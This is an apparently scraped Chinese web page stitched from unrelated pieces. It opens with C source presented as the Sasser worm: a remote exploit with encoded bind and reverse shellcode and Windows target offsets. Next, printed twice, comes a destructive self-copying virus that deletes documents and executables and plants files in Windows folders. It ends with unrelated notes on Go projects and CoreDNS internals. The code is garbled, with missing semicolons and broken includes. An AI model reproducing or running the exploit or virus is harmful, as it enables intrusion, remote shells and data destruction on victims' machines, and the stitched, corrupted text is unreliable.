以下附震荡波病毒C语言源码
#i nclude <stdio.h>
#i nclude <strings.h>
#i nclude <signal.h>
#i nclude <netinet/in.h>
#i nclude <netdb.h>
#define NORM "\033[0000m"
#define GREEN "\033[0132m"
#define YELL "\033[0133m"
#define RED "\033[0131m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM
#define fatal(x) { perror(x)exit(1)}
#define default_port 5554
struct { char *oslong goreglong gpalong lla}
targets[] = {
// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },
{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz
unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
0xC8,0x21,0x0E
}
unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
}
char verbose=0
void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede
memcpy(bsh+0x1d,&gpa,4)
memcpy(bsh+0x2e,&lla,4)
memcpy(rsh+0x1d,&gpa,4)
memcpy(rsh+0x2e,&lla,4)
}
void usage(char *argv0) {
int i
printf("%s -d <host/ip>[opts]\n\n",argv0)
printf("Options:\n")
printf(" -h undocumented\n")
printf(" -p <port>to connect to [default: %u]\n",default_port)
printf(" -s <'bind'/'rev'>shellcode type [default: bind]\n")
printf(" -P <port>for the shellcode [default: 530]\n")
printf(" -H <host/ip>for the reverse shellcode\n")
printf(" -L setup the listener for the reverse shell\n")
printf(" -t <target type>[default 0]choose below\n\n")
printf("Types:\n")
for(i = 0i <sizeof(targets)/sizeof(tsz)i++)
printf(" %d %s\t[0x%.8x]\n", i, targets.os, targets.goreg)
exit(1)
}
void shell(int s) {
char buff[4096]
int retval
fd_set fds
printf("[+] connected!\n\n")
for () {
FD_ZERO(&fds)
FD_SET(0,&fds)
FD_SET(s,&fds)
if (select(s+1, &fds, NULL, NULL, NULL) <0)
fatal("[-] shell.select()")
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) <1)
fatal("[-] shell.recv(stdin)")
send(s,buff,retval,0)
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) <1)
fatal("[-] shell.recv(socket)")
write(1,buff,retval)
}
}
}
void callback(short port) {
struct sockaddr_in sin
int s,slen=16
sin.sin_family = 2
sin.sin_addr.s_addr = 0
sin.sin_port = htons(port)
s=socket(2,1,6)
if ( bind(s,(struct sockaddr *)&sin, 16) ) {
kill(getppid(),SIGKILL)
fatal("[-] shell.bind")
}
listen(s,1)
s=accept(s,(struct sockaddr *)&sin,&slen)
shell(s)
printf("crap\n")
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin
struct hostent *he
char *hostint port=default_port
char *Hostint Port=5300char bindopt=1
int i,s,pid=0,rip
char *buff
int type=0
char *jmp[]=
printf(BANNER "\n")
if (argc==1)
usage(argv[0])
for (i=1i<argci+=2) {
if (strlen(argv) != 2)
usage(argv[0])
switch(argv[1]) {
case 't':
type=atoi(argv[i+1])
break
case 'd':
host=argv[i+1]
break
case 'p':
port=atoi(argv[i+1])?:default_port
break
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0
break
case 'H':
Host=argv[i+1]
break
case 'P':
Port=atoi(argv[i+1])?:5300
Port=Port ^ 0xdede
Port=(Port &0xff) <<8 | Port >>8
memcpy(bsh+0x57,&Port,2)
memcpy(rsh+0x5a,&Port,2)
Port=Port ^ 0xdede
Port=(Port &0xff) <<8 | Port >>8
break
case 'L':
pid++i--
break
case 'v':
verbose++i--
break
case 'h':
usage(argv[0])
default:
usage(argv[0])
}
}
if (verbose)
printf("verbose!\n")
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()")
sin.sin_family = 2
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0])
sin.sin_port = htons(port)
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port)
if (bindopt)
printf("[.] will try to put a bindshell on port %d.\n",Port)
else {
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H")
rip=*((long *)he->h_addr_list[0])
rip=rip^0xdededede
memcpy(rsh+0x53,&rip,4)
if (pid) {
printf("[.] setting up a listener on port %d.\n",Port)
pid=fork()
switch (pid) { case 0: callback(Port)}
} else
printf("[.] you should h***e a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port)
}
printf("[.] using type '%s'\n",targets[type].os)
// -------------------- core
s=socket(2,1,6)
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL)
fatal("[-] connect()")
}
printf("[+] connected, sending exploit\n")
buff=(char *)malloc(4096)
bzero(buff,4096)
sprintf(buff,"USER x\n")
send(s,buff,strlen(buff),0)
recv(s,buff,4095,0)
sprintf(buff,"PASS x\n")
send(s,buff,strlen(buff),0)
recv(s,buff,4095,0)
memset(buff+0000,0x90,2000)
strncpy(buff,"PORT ",5)
strcat(buff,"\x0a")
memcpy(buff+272,jmp[0],2)
memcpy(buff+276,&targets[type].goreg,4)
memcpy(buff+280,jmp[1],5)
setoff(targets[type].gpa, targets[type].lla)
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh))
else
memcpy(buff+300,&rsh,strlen(rsh))
send(s,buff,strlen(buff),0)
free(buff)
close(s)
// -------------------- end of core
if (bindopt) {
sin.sin_port = htons(Port)
sleep(1)
s=socket(2,1,6)
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed")
shell(s)
}
if (pid) wait(&pid)
exit(0)
}
*/
NO 1
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void copyfile(char *infile, char *outfile)
{
FILE *in,*out
in = fopen(infile,"r")
out = fopen(outfile,"w")
while (!feof(in))
{
fputc(fgetc(in),out)
}
fclose(in)
fclose(out)
}
void MakeRubbish()
{
int i
FILE *fp
char *path
char *NewName
char *disk[7] = {"A","B","C","D","E","F","G"}
char *addtion = ":\\"
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
path = strcat(disk[getdisk()],addtion)
chdir(path)
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
}
void CreatEXE()
{
int i
char *path
char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"}
for ( i = 0i <2i++)
{
open(s, 0x0100,0x0080)
copyfile( "C_KILLER.C",s)
}
}
void Remove()
{
int done
int i
struct ffblk ffblk
char *documenttype[3] = {"*.txt","*.doc","*.exe"}
for (i = 0i <3i++)
{
done = findfirst(documenttype,&ffblk,2)
while (!done)
{
remove(ffblk.ff_name)
done = findnext(&ffblk)
}
}
}
void Breed()
{
int done
struct ffblk ffblk
done = findfirst("*.c",&ffblk,2)
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
{
copyfile("C_KILLER.C",ffblk.ff_name)
}
done = findnext(&ffblk)
}
}
void main()
{
printf("THERE IS A VIRUS BY XIAOKE.\n\n")
Breed()
Remove()
CreatEXE()
printf("COULD YOU TELL ME YOUR NAME?\n\n")
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n")
MakeRubbish()
getchar()
printf("IT'S ONLY A JOKE! THANK YOU!\n\n")
clrscr()
system("cmd")
}
NO 2
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void copyfile(char *infile, char *outfile)
{
FILE *in,*out
in = fopen(infile,"r")
out = fopen(outfile,"w")
while (!feof(in))
{
fputc(fgetc(in),out)
}
fclose(in)
fclose(out)
}
void MakeRubbish()
{
int i
FILE *fp
char *path
char *NewName
char *disk[7] = {"A","B","C","D","E","F","G"}
char *addtion = ":\\"
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
path = strcat(disk[getdisk()],addtion)
chdir(path)
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
}
void CreatEXE()
{
int i
char *path
char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"}
for ( i = 0i <2i++)
{
open(s, 0x0100,0x0080)
copyfile( "C_KILLER.C",s)
}
}
void Remove()
{
int done
int i
struct ffblk ffblk
char *documenttype[3] = {"*.txt","*.doc","*.exe"}
for (i = 0i <3i++)
{
done = findfirst(documenttype,&ffblk,2)
while (!done)
{
remove(ffblk.ff_name)
done = findnext(&ffblk)
}
}
}
void Breed()
{
int done
struct ffblk ffblk
done = findfirst("*.c",&ffblk,2)
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
{
copyfile("C_KILLER.C",ffblk.ff_name)
}
done = findnext(&ffblk)
}
}
void main()
{
printf("THERE IS A VIRUS BY XIAOKE.\n\n")
Breed()
Remove()
CreatEXE()
printf("COULD YOU TELL ME YOUR NAME?\n\n")
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n")
MakeRubbish()
getchar()
printf("IT'S ONLY A JOKE! THANK YOU!\n\n")
clrscr()
system("cmd")
}
1.Docker项目网址为 https://github.com/docker/docker 。
介绍:Docker是一种操作系统层面的虚拟化技术,可以在操作系统和应用程序之间进行隔离,也可以称之为容器。Docker可以在一台物理服务器上快速运行一个或多个实例。例如,启动一个Cent OS操作系统,并在其内部命令行执行指令后结束,整个过程就像自己在操作系统一样高效。
2.golang项目
网址为 https://github.com/golang/go 。
介绍:Go语言的早期源码使用C语言和汇编语言写成。从Go 1.5版本自举后,完全使用Go语言自身进行编写。Go语言的源码对了解Go语言的底层调度有极大的参考意义,建议希望对Go语言有深入了解的读者读一读。
3.Kubernetes项目
网址为 https://github.com/kubernetes/kubernetes 。
介绍:Google公司开发的构建于Docker之上的容器调度服务,用户可以通过Kubernetes集群进行云端容器集群管理。
4.etcd项目
网址为 https://github.com/coreos/etcd 。
介绍:一款分布式、可靠的KV存储系统,可以快速进行云配置。
5.beego项目
网址为 https://github.com/astaxie/beego 。
介绍:beego是一个类似Python的Tornado框架,采用了RESTFul的设计思路,使用Go语言编写的一个极轻量级、高可伸缩性和高性能的Web应用框架。
6.martini项目
网址为 https://github.com/go-martini/martini 。
介绍:一款快速构建模块化的Web应用的Web框架。
7.codis项目
网址为 https://github.com/Codis Labs/codis。
介绍:国产的优秀分布式Redis解决方案。
8.delve项目
网址为 https://github.com/derekparker/delve 。
介绍:Go语言强大的调试器,被很多集成环境和编辑器整合。
CoreDNS是使用go语言编写的快速灵活的DNS服务,采用链式插件模式,每个插件实现独立的功能,底层协议可以是tcp/udp,也可以是TLS,gRPC等。默认监听所有ip地址,可使用bind插件指定监听指定地址。
格式如下
SCHEME是可选的,默认值为dns://,也可以指定为tls://,grpc://或者https://。
ZONE是可选的,指定了此dnsserver可以服务的域名前缀,如果不指定,则默认为root,表示可以接收所有的dns请求。
PORT是选项的,指定了监听端口号,默认为53,如果这里指定了端口号,则不能通过参数-dns.port覆盖。
一块上面格式的配置表示一个dnsserver,称为serverblock,可以配置多个serverblock表示多个dnsserver。
下面通过一个例子说明,如下配置文件指定了4个serverblock,即4个dnsserver,第一个监听端口5300,后面三个监听同一个端口53,每个dnsserver指定了特定的插件。
下图为配置的简略图
a. 从图中可看到插件执行顺序不是配置文件中的顺序,这是因为插件执行顺序是在源码目录中的plugin.cfg指定的,一旦编译后,顺序就固定了。
b. .根serverblock虽然指定了health,但是图中却没有,这是因为health插件不参与dns请求的处理。能处理dns请求的插件必须提供如下两个接口函数。
dns请求处理流程
收到dns请求后,首先根据域名匹配zone找到对应的dnsserver(最长匹配优先),如果没有匹配到,则使用默认的root dnsserver。
找到dnsserver后,就要按照插件顺序执行其中配置的插件,当然并不是配置的插件都会被执行,如果某个插件成功找到记录,则返回成功,否则根据插件是否配置了fallthrough等来决定是否执行下一个插件。
plugin.cfg
源码目录下的plugin.cfg指定了插件执行顺序,如果想添加插件,可按格式添加到指定位置。
源码目录下的Makefile根据plugin.cfg生成了两个go文件:zplugin.go和zdirectives.go。
core/dnsserver/zdirectives.go将所有插件名字放在一个数组中。
codedns 主函数
codedns.go 首先导入了包"github.com/coredns/coredns/core/plugin",此包内只有一个文件zplugin.go,此文件为自动生成的,主要导入了所有的插件,执行每个插件的init函数。
接着执行 run.go Run
此文件又引入了包"github.com/coredns/coredns/core/dnsserver",其init函数在 dnsserver/register.go 文件中,如下所示,主要是注册了serverType
剩下的就是解析参数,解析配置文件后,执行caddy.Start。
这里就是根据配置文件中指定的serverblock,执行插件的setup进行初始化,创建对应的server,开始监听dns请求
tcp协议调用Serve,udp协议调用ServePacket
收到DNS请求后,调用ServeDNS,根据域名匹配dnsserver,如果没有匹配不到则使用根dnsserver,然后执行dnsserver中配置的插件
以k8s插件为例
参考
//如何写coredns插件
http://dockone.io/article/9620
//coredns源码分析
https://wenku.baidu.com/view/34cabc1e346baf1ffc4ffe4733687e21af45ff7c.html
https://blog.csdn.net/zhonglinzhang/article/details/99679323
https://www.codercto.com/a/89703.html
//NodeLocal DNSCache
https://www.cnblogs.com/sanduzxcvbnm/p/16013560.html
https://blog.csdn.net/xixihahalelehehe/article/details/118894971